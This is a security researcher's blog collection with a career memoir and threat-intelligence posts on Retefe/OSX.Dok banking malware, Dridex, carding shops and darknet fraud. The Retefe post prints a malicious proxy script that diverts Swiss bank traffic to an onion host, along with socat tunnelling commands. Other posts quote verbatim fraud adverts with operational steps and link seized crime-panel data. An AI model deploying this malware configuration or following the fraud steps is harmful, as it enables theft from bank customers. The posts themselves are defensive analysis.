Journey into Security - Part 2

I was fortunate enough to work with some incredibly talented people in my journey into security, who helped me understand difficult concepts, some of which I am still learning.

  • Cryptography
  • Windows Internals

Two skills I believe are absolutely key to working in security because no matter where you go inside security you'll need an intimate understanding of both, so that's where i decided to start, i was working on user virtualistion software, this is, in essence, a reflection of roaming profiles, and using some magic to ensure a consistent user experience across all platforms, including physical and virtual desktops, not limited to stuff like published desktops from Citrix, Vmware & Microsoft. 

I furthered my understanding by buying a couple of books..

Internals

Internals

Learn that sh*t

I probably refer to at least one of these books once a week for a function or the parameter of a service, partially because I have a terrible memory. In that role, I was automating some of the work I was doing and came across tools like psexec, sysmon and the rest of the toolkit. So like any analyst, I automated some of my testings and begun to explore the rest of the tools.

Process Monitor & Explorer - thank you, Mark and Bruce!

I used this to troubleshoot registry problems, identify login issues and generally understand what was happening during login. A low-level way of examining & testing bugs that I was trying to non-programmatically troubleshoot.  

Little did know that during the troubleshooting I would identify malware infection in my own lab, I was able to track this down using some of the inbuilt filters which captured the process running when I visited a certain site. This was the moment I knew I was interested in malware. I didn't have any idea what it was capable of but I knew how to identify it and how to remove it.

Moving on

I was 'content' at the role I just mentioned, and had a passing interest in security, but became more and more fascinated by some of the articles being published online I attempted a few ctf's and failed miserably, I didn't know what I was doing, and although I was curious - I took defeat very badly, and personally. I was persistent - I started visiting some forums and asking questions, i joined kernelmode.info and starting reading the content, copying and learning.  I also learnt of Lenny Zeltser as part of my research and found this which was at version 5 i think when i discovered it, and it included cheat sheets on taking apart malware! I was saved, i had step by step guides on using the tools I had watched, and learned a lot (Thank you, Lenny!)

I had a keen interest in attending FOR610 and joked ' i would give my first born to go', the reason was that it was super expensive. I learnt an awful lot on this course and still refer to the course materials to this day, both Lenny and his colleagues are incredibly helpful, approachable and clearly enjoy what they do. 

I've spent a few years at Fujitsu now and learnt more than I can possibly write down here, but some of the highlights included working alongside great people, and being fortunate enough to work at the NCSC as part of the previous Fusion Cell, and now known as Industry 100. Representing Fujitsu on a number of occasions all over the world, and attending Blackhat & DEFCON. Speaking at conferences on behalf of my employer is something i am incredibly proud to do, and something which impresses my daughter even more - which is all that matters.

Giving back

I have the opportunity to share what I know and have learnt. This kind of opportunity is something that gives me an incredible feeling of gratitude knowing I am assisting those who need to learn, like me I forever refer to myself as a 'noob', because when you realise you know everything, you realise you know nothing. The opportunity in question is working alongside some talented people at CTU in Prague on a project called CivilSphere working remotely to protect those vulnerable from being targeted. I have always been impressed by the work done by the likes of CitizenLab and was inspired to try and be part of this protection network. I am very thankful to Sebas for this opportunity, and all the talented people at CivilSphere.

Next Steps

I will be leaving Fujitsu in a few weeks, to start a new role at Proofpoint. I look forward to learning more interesting concepts, and being a noob all over again.

 

 

Journey into Security - Part 1

I consider myself a noob, forever asking simple questions. Just how does DNS work? WTF is a floating pointer. A lot of these questions borne out of curiosity, and a few people said they would be interested in hearing how I got into Security. So i decided to write it down, it feels very much ' LOOK AT ME HOW COOL I AM ' and self indulgent writing this, but that couldn't be further from the truth, i hate talking, or writing about myself but in light of the current state of security, and being considered a mentor to a few people and working with extremely bright people i felt obliged.

I have loved computers ever since i could remember, i won't bore you to tears with my first computer because its likely the same as most people my age, but here is a photo of it. 

BBC_Micro_Front_Restored.jpg

2Mhz CPU

A shared computer at home, no games.

Fast forward a very long time to my teenage years and I was asked to help out at a family friends place of work, they had high-speed scanning of documents(invoices, purchase orders etc), I automated parts of this job and put a few people out of work (sorry) With this came the management of the storage of the scanned items, which came with the ability to identify secure methods of storage. At this point, an online presence was just emerging in terms of retail so it wasn't really a consideration that at some point payments would need to be taken online and managed in an office and placed internally. So my curiosity led me to a device known as a domain controller (Windows 2003 SBS) which contained the following 

  1. DHCP
  2. DNS
  3. WINS

WTF was this? and what did they all mean, well i needed to understand what I was working with some I quickly spent a lot of time on  place called TechNet, before Microsoft released the useless bots to answer questions, it was a thriving community with a lot of answers and help, I learned the basics of network management here understanding what a subnet was, and why it was important to track who was using what range, and I why. ( Think credit card processing )

Now I realized at the time a lot of letters started to appear on the signatures of my peers ( MCSE, CompTIA) I thought, what was this? a quick Yahoo!( yes, yahoo ) a search showed me that Microsoft was giving certifications to people who took tests and with that came the letters! Cool, I thought, i was in my 20's and had not sat a test since school, and i did not go to University so it was natural to try and test myself. That particular employer did not give me any training so i had to leave and ended up at one job (i have missed out two roles here that do not have any impact on my journey into security ) - i ended up at a communications company, dealing with MPLS, leased lines, dedicated fibre links etc. Basically, the stuff that powers the internet & telephony.

My first job in this role was to 'map the network' - wait, what? I didn't have the slightest idea where to begin, routers? Switches? i was a Microsoft specialist and had sat away from networking because of dedicated resources, i had the opportunity to understand these things and did so quickly, i had a vague idea of the topology and was able to Visio a map in about 14 days. This was as much a test for me as it was for the company, we had:

  1. WAN Router(s) exposed by default auth
  2. Hardcoded credentials in reception for wifi
  3. Gold Images that had no updates applied for over 10 months

So at this point, i had access to an Active Directory with approx 3,00 users and mobile devices, computers which ran XP and a Windows 7 deployment upcoming. This was my job to manage, design and deploy. I was very scared. computers where something i used not something i knew what to make use of!

I was extremely fortunate enough to attend a Microsoft Course which was titled ' Fast track to managing and maintaining an active directory domain 2003,' , this course 5 days away from my home in a strange city taught me so much, i had 10hrs a day exposed to an active directory domain that i build and could break and rebuild without the fear of a P45 arriving, i got further into some concepts that i had come across ( DHCP, DNS, WINS) and some other more interesting concepts which iginited my interest further.

Security 

I had long been in awe of security specialists, I had only minor interaction with these superheroes, they usually worked in a Firewall team, or some other amazing sounding team - and would only appear when things where bad, so that was my interest, what DID these people do?  Well i quickly discovered that a set of ACLS on a firewall was not as interesting to me as managing a forest of objects for thousands of people and understood securing active directory was much more interesting, i started to dig into Active Directory and trying to understand further i quickly learned about a few things

  1. Active Directory is hard
  2. Active Directory is hard
  3. Active Directory is hard

Now the grizzled amongst will say it's not, I completely disagree - the entire concept of Active directory has been badly managed, and whilst its now an entire attack surface and has brought to light some of the most incredible attack methods, there is very little in the blue team area of protecting Microsoft Active Directories.

So. after dedicating a few years to becoming a specialist* in Active Directory security, i moved on. A role in the legal marketplace. I was protecting the assets of solicitors, a domain unlike any other i've ever worked in before. A difficult but challenging role because of the reliance of physical documentation for legal professionals restricted much of what is digitised. 

Exams, Exams.

Screen Shot 2018-03-04 at 2.13.43 pm.png

I was very boring for a few years, taking exams every few months.

 

One day, I arrived for work and was told i would be sent on an ' intervention', this in the UK refers to a concept when a legal practice is in distress a member of the 'SRA' will intervene and take over, this included all electronic items. I was basically an IT bailiff.  

I had managed antivirus solutions because nobody else would (Who can blame them?) but quickly realised what a GOLDMINE of information was being identified, it was a pretty default policy ( block, allow, delete, quaratine ) the little friction it was generating was not worth the cost of renewals, so I changed it an applied it to different machines, using different policies depending on location and level of practise seniority, I didn't want to get the sack because a partner of the practice couldn't plug in the USB device he also used at home. 

I was identified as a potential for the intervention ' because Bryan knows security '. Did i? Not really, but I did know how dangerous office macros where and why IE6 really shouldn't be used. Let's go - anyway, an 'encrypted database' was being used to store all client data and we needed it to be able to 'take on the cases'. the 'encrypted database' was a Microsoft Access database, it was trivial to crack, made even easier by the fact the password was stored in passwords.txt in the same directory.

Anyway, I was hailed as a savior and even though no laws where broken, that resulted in a lot of money being earnt, and my value rising too (all because of a password policy?)

So i was given access to be able deploy my OWN antivirus policies as a result of some good work around ' finding passwords in directories called passwords', i had shown interest so there we go.

I deployed extremely restrictive policies to execs, so much they complained, i updated device controls to prevent data loss via mobile phones, and usb sticks, and identified the malware as a result of this and thought ' well this is cool', im using something someone hates to hear about to find all this bad stuff, who wouldn't be interested in this?!' Turns out it was only me, and this is where my security passion was really born.

Hello, Pentester 

Fast forward a few months and i received an alert from my very restrictive policy alerting me to someone running passwordump.exe on my domain controller, but not only did i lay a very small egg in my pants but i was worried because the domain controller was a honeypot. I had deployed a few domain controllers in a sense that they advertised the services to a would be a attacker but contained no actual resources. A modern day RODC but RODC was a thing. Turns out we had a 'black box' pen test in which the manager was aware of, i quickly identified the pen tester in a room he had 'walked into' and plugged into a telephone port, identified the DHCP range as being broadcast from my 'domain controller' and thats all - i just named the server as DOMAIN CONTROLLER and no ntds.dit was enough to attract the attention of his toolkit. The server was only running DHCP.

Anyway i tried to take control of his session, and this image made it into the eventual pen test report as a way of positive feedback on deception.

 

 LOL no

LOL no

What does this button do?

I moved on from that role, as my passion for security grew I moved to a company that was responsible for user virtualization, I learned more here about user profiles than i can ever forget, the stages of authentication involved in a login, the handshake and crucially the concepts around Kerberos and NTLM - had a core understanding of authentication and the reliance on trust for authentication, and with this came a more curious minded approach, I worked with extremely talented developers and students who where driven by curiousity from an academic sense, I was purely trying to learn and stop being a noob. I was in a QA team, a bug hunter! sadly, the only bugs that drew attention were not ' this button works', but that the storing of plain text passwords in SQLite databases kinda bugs.  Along with the realisation that I should be documenting every single thing I ever needed to know in a physical form so I bought Moleskines

Lots of them.

IMG_2231.jpg

Notes

Write that sh*t down

As I've written here I have realised a second part will be much more interesting than one long boring post. It will include more of the recent stuff, a failed CISSP study attempt,  how I identified bugs before bug bounties were cool & some malware stuff.

Panel party - Loki, Pony.

Hunting via Hybrid Analysis I identified persistent offender(s) storing content on a panel. I kept my eye on it for a while, and when it was busy enough, I managed to get the entire server configuration panels.

Wallet stealer
  1. Loki admin
  2. Pony admin

Usernames, passwords for MySQL and database configurations, over 100 lists of target applications, BTC wallets, FTP clients, browsers, games

The most interesting thing for was that Loki has a POS module.

Here is the contents, ping me it become unavailable

  • https://drive.google.com/open?id=1l3vcGBnbknVhu-Fe6KZ5XB9LLEYx8Pua
  • SHASUM: 591cc7fe34d5cd76c7bd8be4ee9d94741e293946

Have fun.

Russia v Ukraine : A primer for the uninitiated

Russian intervention in the Ukraine, be it military or 'cyber', historically has been something of a strategic playground, whilst other attacks observed are more 'noisy' - or disruptive, the ongoing incidents which can be, and will be attributed to Russia. If like me, you're a scholar at the aspects of cyber incidents particularly when it comes to Russia v Ukraine which experts will quickly identify and theorize are the work of the shadowy Russian bear(s).

My own learning has focused on 'why', and I've digested  and recommended the following

  1. The 'ultimate' guide, in my humble opinion, is here Russia v Ukraine  Kenneth Greers
  2.  APT28 or depending on the vendor
    Pawn Storm,
    Sofacy Group,
    Sednit,
    STRONTIUM,
    Tsar Team,
    Threat Group-4127,
    Grizzly Steppe (when combined with Cozy Bear) The important part to note here is that APT28 is widely believed to be GRU, and GRU are explained in detail here 
  3. APT29 or Cozy Bear, again depending on the vendor may be called any of the  following Office Monkeys, 
    CozyCar, 
    The Dukes, 
    CozyDuke, 
    Grizzly Steppe (when combined with Fancy Bear)

This is the best infographic I have seen explained the process of APT28/29 activity.

APT28_APT29_Techniques_-_Spearphising.png

 

There are a breathless number of analysts capable of dissecting the incidents that occur within the Ukraine borders and often more are bullet quotes seeking to encourage fear, uncertainty and doubt, AKA FUD. My experience of working with some extremely talented analysts both in the Government and at F500 who actively avoid headline-grabbing and offer comments by way of research and analysis. Robert M.Lee explicitly called out this type of behaviour and asked 'stick to the facts'.

The concept of 'hackers' knocking out power in a country is one which evokes a large number of reactions, I look to people like Robert M. Lee for measured and sensible analysis, as should you - if your number one source for information is mainstream media, you won't get insights, you'll get clickbait.

With that in mind, the elephant in the room is the 2016 US. The election, something which those not directly involved in intelligence, be it cyber or policy will still be closely unpicking. I recommend the following content for insights how the 'fake news' - and i still can't say that phrase with a straight face, helped undermine the political agenda.

Some of these are incredibly long-winded and contain quite a lot of personal sentiment, but if you can decipher that and understand the underlying themes in that disinformation played a significant part in the U.S Election you'll understand what a weapon social media has become and why, as a 'Cyber Threat' analyst, you'll be required to place extremely close attention to it.

Cambridge Analytica  

https://medium.com/join-scout/the-rise-of-the-weaponized-ai-propaganda-machine-86dac61668b

tl:dr - big data manipulated everyone.

The Plot to Hack America by Malcom Nance

https://en.wikipedia.org/wiki/The_Plot_to_Hack_America

tl:dr - Coincidence takes a lot of hard work, Also - Russia sought to manipulate the election by way of a number methods including social media propaganda, hacking of DNC emails and strategically placed adverts

Is Ukraine the Test Lab for Russian - Wired

https://www.wired.com/story/russian-hackers-attack-ukraine/

tl:dr - Attackers gained access to critical systems, excellent analysis from Dragos here 

 

Retefe v OSX.DOK Part 2

I last month had some time to look at the latest iteration of OSX.DOK/Retefe for macOS and thanks to Jaromir from Avast and the excellent VB presentation I can conclude they are almost identical, the reasons for this include the following:

From the presentation at VB Avast noted

The below is collection of the some of the recent samples collected from Swiss campaigns targeting OSX victims.

The payloads are being signed with developer certificates presumably either stolen which enable them to bypass the macOS security feature known as Gatekeeper, it's not clear how these accounts are being used or if they are using pseudonyms to prevent suspicion below are some samples. You can use the codesign command with relevant parameters to identify the signed status of the app bundle 

Masquerading as trusteer.app

 

All macOS apps need a manifest file known as a info.plist file which includes the MachineOSBuild as a tag, which in this case was 13F1911 which is commonly known as OSX Mavericks, which means it was likely a Virtual Machine or the developer has an older OS 

The samples are UPX packed 

Screen Shot 2017-05-17 at 22.57.44.png

I've just uploaded one single sample for researchers to analyse, however, Apple is actively investigating the misuse of these certificates.

https://www.virustotal.com/en/file/80634e7b69f77825e5316e046c5a08c70b9950123845ef9a54a1abb9d8acb9a9/analysis/1495058845/

  • 11/05 notify Apple Security
  • 13/05 confirmed incident with Apple Security
  • 17/05 shared developer identities with Apple

Retefe and OSX.DOK - One and the same?

A few vendors announced a malware family known as OSX.Dok which targeted OSX, using strikingly similar methods that i had seen used by Retefe, having observed some of the configuration changes recently, this seemed too similar to be a simple coincidence.

For those unfamiliar, Retefe is a trojan, and numerous configurations exist which usually target most EU banks. The United Kingdom, and France but a real target in my own experience has been Germany and Switzerland. This article last week identified Germany but included a Swiss screenshot by Checkpoint here so slightly confusing.

The part of Retefe which struck me as similar included the proxy .JS file for the trojan to identify the range of banking sites it wants to intercept.

function FindProxyForURL(url, host) {
    var proxy = "PROXY paoyu7gub72lykuk.onion:88;";
    var hosts = new Array('*.postfinance.ch', 'cs.directnet.com', '*akb.ch',
        '*ubs.com', 'tb.raiffeisendirect.ch', '*bkb.ch', '*lukb.ch',
        '*zkb.ch', '*onba.ch', '*gkb.ch', '*bekb.ch', '*zugerkb.ch',
        '*bcge.ch', '*raiffeisen.ch', '*credit-suisse.com', '*.clientis.ch',
        'clientis.ch', '*bcvs.ch', '*.cic.ch', 'cic.ch', '*baloise.ch',
        'ukb.ch', '*.ukb.ch', 'urkb.ch', '*.urkb.ch', '*eek.ch', '*szkb.ch',
        '*shkb.ch', '*glkb.ch', '*nkb.ch', '*owkb.ch', '*cash.ch',
        '*bcf.ch', 'ebanking.raiffeisen.ch', '*bcv.ch', '*juliusbaer.com',
        '*abs.ch', '*bcn.ch', '*blkb.ch', '*bcj.ch', '*zuercherlandbank.ch',
        '*valiant.ch', '*wir.ch', '*bankthalwil.ch', '*piguetgalland.ch',
        '*triba.ch', '*inlinea.ch', '*bernerlandbank.ch',
        '*bancasempione.ch', '*bsibank.com', '*corneronline.ch',
        '*vermoegenszentrum.ch', '*gobanking.ch', '*slbucheggberg.ch',
        '*slfrutigen.ch', '*hypobank.ch', '*regiobank.ch', '*rbm.ch',
        '*hbl.ch', '*ersparniskasse.ch', '*ekr.ch',
        '*sparkasse-dielsdorf.ch', '*eki.ch', '*bankgantrisch.ch',
        '*bbobank.ch', '*alpharheintalbank.ch', '*aekbank.ch',
        '*acrevis.ch', '*credinvest.ch', '*bancazarattini.ch', '*appkb.ch',
        '*arabbank.ch', '*apbank.ch', '*notenstein-laroche.ch',
        '*bankbiz.ch', '*bankleerau.ch', '*btv3banken.ch', '*dcbank.ch',
        '*bordier.com', '*banquethaler.com', '*bankzimmerberg.ch',
        '*bbva.ch', '*bankhaus-jungholz.ch', '*sparhafen.ch',
        '*banquecramer.ch', '*banqueduleman.ch', '*bcpconnect.com',
        '*bil.com', '*vontobel.com', '*pbgate.net');
    for (var i = 0; i < hosts.length; i++) {
        if (shExpMatch(host, hosts[i])) {
            return proxy
        }
    }
    return "DIRECT"
}

from the OSX version which include the following LaunchAgents

/usr/local/bin/socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:80,socksport=9050

/usr/local/bin/socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:5588,socksport=9050

You'll note the .onion site in question is present both in this configuration and in the article discussed above. Additionally, the similarities continue:

Retefe       OSX/Dok

Root Certificate    Root Certificate

Proxy hijacking   Proxy hijacking

paoyu7gub72lykuk.onion paoyu7gub72lykuk.onion

Banking trojans have been at the forefront of media for a while, and the revenue they generate are clearly attractive to criminals and to law enforcement as demonstrated recently both here and here.

 

 

 

 

 

#MongoDB - A dumpster fire of cry laughter

Thankfully, a lot of interest is on MongoDB over the past few weeks. It's not a new problem, however, the more people reporting on it the more C-level people will ask the question of 'where is my MongoDB?'

John Matherly originally wrote about this in 2015 This entry has since been resurrected and will no doubt be again resurrected in another 12 months. A significant media outlet are taking note in this extortion practice and for me, whilst painful for the victims this is simply part of the stratagems associated with online survival.

There are circumstances in which you must sacrifice short-term objectives in order to gain the long-term goal. This is the scapegoat strategy whereby someone else suffers the consequences so that the rest do not.
— https://en.wikipedia.org/wiki/Thirty-Six_Stratagems#Sacrifice_the_plum_tree_to_preserve_the_peach_tree

So, with this in mind. Let's take a look at the data currently available as of 05/01/17. Data will be redacted, I don't want the responsibility of dealing with the consequences if they are eventually extorted.

  •  Job Site

IP address, location, current job title

  • Health data 

Passwords, DOB, Weight, Height, Phone number, Diabetic status, last login IP


  • An android .APK backend for tracking users of a Satellite app

Some further data included, Network type, IE: 3G, 2G

The Money Team - A multinational fraud gang

The thriving carding forums that reside under most .ru domains or .su offer a significant amount of diverse fraud options, ranging from simple carding fraud from dumps or CVV dumps. I had identified, ' The Money Team' by way of their preference for offering what is known as pink slips.

 

Pink slips are known better as those used in financial dealings, and in particular Insurance firms. Those fraudulent forms used here are targeting the following

  • Alpha Insurance
  • CSG
  • FAC
  • Ingosstrakh - A Moscow-based entity with financial stability rating of A++

Offering a substantial amount of documentation via a DNM for the following prices, which are competitively priced based upon a sliding scale depending on amount purchased. IE: more slips, the cost goes down.

  • 1 completed application form - 2500r
  • 10 letterheads - 900p 
  • 20 forms - 870r 
  • 30 forms - 850r 
  • 50 forms - 700r 
  • 100 forms - 650r 
  • 300 forms - 550r 
  • 500 forms - 500r 
  • 1000 forms - 450r 
  • 5000 forms - 400r 
  • 10000 forms - 380r

As a potential buyer of the documents you can request a sample, a reputation as a buyer is required, and if you're feeling adventurous you can ask for a courier such as SDEK/DIMEX/CSE.

Branching out, and diversification of a criminal enterprise is key to success and the soon to be launched tmtdocs.com site offers a direct link to their trades

The site unsurprisingly sits behind CloudFlare 

I will be paying close attention to what other services pop up from TMT.

 

2016 a year in Review

Goodbye 2016

A year in security is a considerable amount of time, the amount of breaches, attacks and disclosures have been almost non stop and we're not finished yet. I have listed below some of the most notable 'cyber' incidents which caught my eye for a number of reasons.


  • HSBC Bank attacks - January 
  • Operation Dust Storm - Feburary
  • DROWN vulnerability - March
  • Panama Papers - April
  • RDP Bruteforcing - May
  • Democratic Party Hack - June and of course the disappearance of Angler around the same time and NATO recognises Cyber as a '5th domain of warfare' 
  • xDedic forum - July
  • ShadowBrokers 'dump' - August
  • Brian Krebs DDOS attack - September and the Congressional oversight releases the report on the OPM breach 
  • Trickbot - October
  • Three data 'breach' - November
  • Avalanche takedown - December Bonus video footage of the arrest here  

No real surprises for those in the trenches of security, I've missed out some of the more 'media' friendly stories as cyber became front page news this year, with every DDOS and breach impacting those who have zero idea how the incident will have occurred.  Typically cloudy responses from the organisations affected do not help the affected, or more importantly the victims.  

What are companies doing to ensure this doesn't happen to them? The basics, the advanced intelligence led security endeavours to look for the potential attack vectors and methods being used elsewhere, and deriving the intelligence from them, but the fact is most attacks are NOT sophisticated. This phrase is only tagged onto those incidents that make front page news, or as i call them the BBC factor. I am a big fan of @thegruqg for one his clarity in tone for security along with his razor wit is good to see in security, he is a poster boy for security snark and backs it up with proof.

The ultimate being this tweet

New rule: if you are hacked via OWASP Top 10, you’re not allowed to call it “advanced” or “sophisticated.”
— https://twitter.com/thegrugq/status/658991205816995840

 

And he is so right, Tesco may have been hacked by a vulnerability in the back office system, or an insider threat offering access to his terminal for transactional access, but the fact remains few of the breaches above where ' sophisticated'

  1. xDedic - bruteforcing RDP sessions
  2. Three Data incident - insider
  3. Panama Papers - SQL Injection
  4. Brian Krebs DOS attacks - hardcoded passwords and insecure protocols in CCTV, and DVR systems
  5. OPM breach - ignorance of the clear threats and lack of understanding from top to bottom, which resulted in the Oversight report and the person at the top losing her job.

 

2017 predictions are here, and i'm totally serious

Security predictions for 2̶0̶1̶7̶ 1998
1. Macro malware
2.MD5 passwords
3.Companies threatening security researchers for disclosures.
— https://twitter.com/Bry_Campbell/status/810091303417610240

#Dridex has big ambitions..

Dridex, Dridex. The bane of so many people's lives. My included. Has been 'quiet', i made a post in the hope it had gone away. It had not. It has returned with a couple of new Botnet ID's, 144 and another 1024 which i am still working on.

Includes a list of interesting targets.

The interesting part is the 'sgoldtrakpc' part, which leads to this conclusion:

FPS GOLD provides core processing and eBanking software for community banks across the United States. We offer the solution to all of your banking challenges—including ever-changing regulations and security threats. And the FPS GOLD solution is fully integrated, saving you time and money.
— http://www.fps-gold.com/about.aspx

From the sample Matt posted and the one i was analysing, included a comprehensive list of commercial banking applications, and also an improved list of enterprise applications. List is here see the comments for the full list.

Samples used in analysis here & here

Incidentally, Dridex has historically been delivered by an macro enabled document, Microsoft recently backported a good solution to blocking these from downloading malicious payloads using this - https://support.microsoft.com/en-us/kb/3115427 but it was exclusive to Office 2016. Thankfully, it's now in Office 2013! Please install this patch ASAP.

Going shopping on the Dark web

I've recently learnt the impact of what, we the, 'entrenched' take as the norm. Case in point

 

To the vast majority of security, this is not 'news', but that doesn't take away the fact that this is equally as important to those affected. Graham Cluley also has some thoughts on it here

But what hackers frequently do these days is use a technique known as “credential stuffing” - taking the information they have stolen from one site, using it to log into another site, and then using any information they gather on any accounts they manage to access to gather additional personal information which could be used for fraud.

— https://www.grahamcluley.com/2016/07/yes-data-breach-really-fault/

So with that in mind, i thought i would demonstrate what is available on one of the more popular 'Darknet Markets' - A primer here on that area here

Firstly, some markets are usually quite accessible.  A good list here There is an exception to the rule for some markets that do require a deposit, or a cosign from someone legitimate enough to 'vouch' for you.

What can i buy?

Lots, you can can usually identify the interesting things in much the same way as most auction sites do, by way of feedback. A quick run down on some of the items, physical and virtual and the services associated with them are below

  • Banking

I wrote about muling here but the level of services used in between these are not limited to muling, there are 

  • Carding Services - Hotel fraud, such as booking services and ticketmaster gift cards.

Screen Shot 2016-07-26 at 21.23.54.png

Damaging to the brand associated with the theft & fraud.

  • Bank Account transfers - Often taken from compromised devices or those botnet owned.


  • British Airways accounts - Often from RATTED machines


  • Weapons - Yes, you can order a weapon from the internet


Personal information is a commodity in itself and arguable the most valuable, however its value is dependant on those who can best use it to gain most profit, its for sale here too as mentioned in relation to the original o2 article.

The insider threat is something which is gaining a lot of attention and will only grow as a exponential threat to businesses who do not understand the concept.

This advert offers an insider inside all of the UK's most popular Phone stores


Boggalertz - Best Seller in the world, just wait and see.

Please read this carefully************

To take advantage of these profiles you will need the following
1) An insider in any phone shop
2) A credit or debit card, which you know the pin and registered address for
3) there must be at least £10 on the card
4) This is for UK only

Heres how it works.......
* You send me the door number and the postcode of the registered card, EXCLUDING the LAST 2 LETTERS. ( SO I DON’T EVER KNOW THE ACTUAL ADDRESS)
* I will send you back a profile which will pass for mobile phones in ANY phone shop, providing you use the correct card
*You go to your insider and place orders for as many handsets as you can get your grubby little mitts on
*You leave me nice feedback and tell the world that BOGGALERTZ is the worlds best seller!

—————————————————————————————
You will need an insider because of 2 reasons
1) the DOB may not match what you or your striker looks like
2) the name will not match the name on the card (which I will never know)


Again, to the majority of the security community this is not a 'new' concept. However encouraging mainstream media to take an active interest in this will highlight its availability and ensure that those at risk are educated more and understand the risks.

 

 

 

Tools of the trade: An intro.

I received an email from someone just starting out in security as a chosen career path and had bought a laptop to use purely for research. I don't particularly advocate any one laptop over another, i use a *Macbook for two reasons

1. Resale value

2. The screen is amazing, and my eyesight is getting progressively worse.

I outputted a list of my tools and was surprised at just how much i had customised my device.

  • KnockKnock from Patrick Wardle, along with a lot of other tools are available here "KnockKnock... Who's There?" See what's persistently installed on your Mac. KnockKnock uncovers persistently installed software in order to generically reveal malware.
  • Little Snitch - Essentially a firewall, but offers usability.
  • Hopper - Disassembler for x86/x64 RE - Not free.
  • Radare - Another disassembler, my personal preference.
  • Brew - It's amazing OSX comes without half these tools, but you'll quickly realised you need them.
  • Shodan command line  - As above, really is part of everything i do.
  • Olevba - Excellent parsing for OLE files, usually MSOffice.

As an addendum, there is an brilliant 'hardening guide' for OSX here


N O T E : this is for beginners, as a more seasoned security researcher you're probably used to seeing these tools and probably shouldn't be reading this.

 

*Other excellent Laptops are available

 

 

 

Inside an international Carding shop

There is a world wide trade in stolen, or compromised credit cards which often end up in the hands of a few criminals who instead of attempting to spend the cash will choose to sell the content to those who can better 'cash out' and move the compromised content into account(s) that can essentially launder the cash. Muling and laundering reports here and here from Europol


Support manager shop (English) Please contact : ICQ ID : 684523892Email : [email protected] Yahoo : Chim_ThaiLan

The ICQ number 684523892 is associated a large number of results all associated with the trading of stolen/compromised credit card details. One such shop offers a significant amount of coverage including the US, China & EU

There are two types of cards referred to as 101 and 201

201 = Larger limits and no regional restrictions but requires chip verification

101 = Restricted limits (the preferred for criminals and those learning the carding game) and not chipped.

The rough translation of 'Chim_Thái_Lan' is 'Birds Of Thailand' which could be a reference to the location of the carding operation in terms of Asia, the shop offers assistance both in Thai & English as well working between the hours of BST and +6 Thai time.  When i asked for the rates and promised on purchasing i was faced with the following :

Thank u for interest!! rates below and promise value (:

? - DUMPS 101 Track1+Track2+PIN.
? - DUMPS 201 Track1+Track2+Track3+PIN.
? - Daily update.
? - Fast automatic payment methods
? - Replace lost/stolen/hold/card error/call
? - Replace if the card balance is less than $1,000
? - Balance > 1,000 - 100,000 EUR/USD
? - Lowest prices at a stuff of such quality.
? - After purchase you will have 3 days to check
? - Refunds
? - 100% GUARANTEE WORK
? - Support 24/7

 

Not sure about doing business with these guys just yet, i'll consider my options.

Patchwork & The Dropping Elephant APT

Good work from Gadi and the team at Cymmetria & Kaspersky -  Cymmetria report is here , Kaspersky here 

What struck me as odd and reminded me of some of the work i looked at in May was this line in the Kaspersky analysis:

it hides base64 encoded and encrypted control server locations in comments on legitimate web sites. However, unlike the previous actors, the encrypted data provides information about the next hop, or the true C2 for the backdoor, instead of initial commands.
— https://securelist.com/blog/research/75328/the-dropping-elephant-actor/

This particular comment struck me because in early may i was analysing some malicious .pps documents i had received and identified a number of CVE's being used in them, they contained material related to the Government projects and political interests in SE Asia.

Example metadata from .pps leveraging CVE's

I was struggling to identify what type of campaign this was, when i identified some of the C2 commands were being stored in blog comments on legitimate web sites although they were completely unrelated to any political activity.



There is a lot of security research available in the political unrest of SE Asia, South China Sea. A lot of the content available to research has been laid by FireEye  the ongoing territorial disputes are being fought with a very competitive cyber theme.

Welcome back #Dridex

My most recent blog indicated we would see the back of Dridex  & Locky, in hindsight it was a bit hopeful. P2P botnets Do not die the very principle they are built on offers a level of persistence that makes it near on possible to remove.

It has 'returned' - hat tip to @malwaretech who has significant fingers in pies with Necurs and can identify a lot of what Dridex is doing.  I'm time limited in terms of RE at the moment and the changes in Dridex has shown, thankfully they are being identified by Matt Mesa at Proofpoint


What i have identified as a result of some recent changes is the OS fingerprinting which is new( to me at least to me) Dridex is actively identifying the OS running on the host


So, the question to me , why is Dridex looking to fingerprint the OS? I observed some interesting checks in the macro too including the number of documents opened previously ( Attempted Sandbox evasion i assume) but this is easily bypassed.

Goodbye #Dridex, good riddance #Locky

The Past

We will no doubt shortly see some official word on the 'takedown' of Dridex and/or Locky, it has been widely reported that the lack of daily spam campaigns indicates its disappearance is linked to the FSB operation. Its widely known that the FSB only get involved in cyber criminal activity when there is significant international pressure to investigate. 

It's difficult not to draw logical conclusions on the timings of the two operations and subsequent disappearance of Dridex/Locky but its unlikely that Russia would be directly involved in a 'takedown' operation of a significant botnet which was responsible for the theft of money from banking institutions.

During the period from mid-2015 to the present day, 18 targeted attacks have been recorded across the country at bank customers’ automated workstations. The damage caused has exceeded 3 billion rubles. The police have prevented potential damage in the amount of 2 billion 273 million rubles.
— https://xn--80agyg.xn--b1aew.xn--p1ai/news/item/7894434/

FSB & MIA worked with Sberbank to conduct this operation and the reports from Russian intelligence indicate around  2.2 billion rubles where lost between October 2015 to March 2016 which ironically is the same time of the Smilex arrest who at the time was in Cyprus, originally from Moldova.

The Present

  • Vawtrak/Hancitor/H1N1
  • Vawtrak = Banking Trojan AKA Neverquest
  • Hancitor = Dropper, usually by a Macro 
  • H1N1 = Loader, with UAC bypass  (With some additional checks for GetCurrentProcess, and a nice crash) - Thanks to the genius' on KernelMode

Identifying Hancitor was done by post infection in my lab -  Thanks to Matt as ever.



 

Really great overview here from Proofpoint and a sample here 

 

 

#Powershell - The enemy you are already losing the battle against

Powershell, and the attacks it is capable of is not a new concept. The number of publically available frameworks are growing exponentially. It's a trusted method of attack and one that is gaining more and more focus from those capable of leveraging its Power.

Why should you fear PowerShell leveraged attacks? Well, for a number of reasons:

  1. It's probably present on every single machine in your enterprise. 
  2. It's a native tool which is difficult to detect if used in an attack.
  3. It leaves very, very little in terms of forensic evidence on either endpoint, or if moving laterally across a network.
  4. Malware is already using it during attacks
  5. The namespaces it's capable of 'plugging' into are terrifying 

https://msdn.microsoft.com/en-us/library/system.directoryservices.activedirectory(v=vs.110).aspx

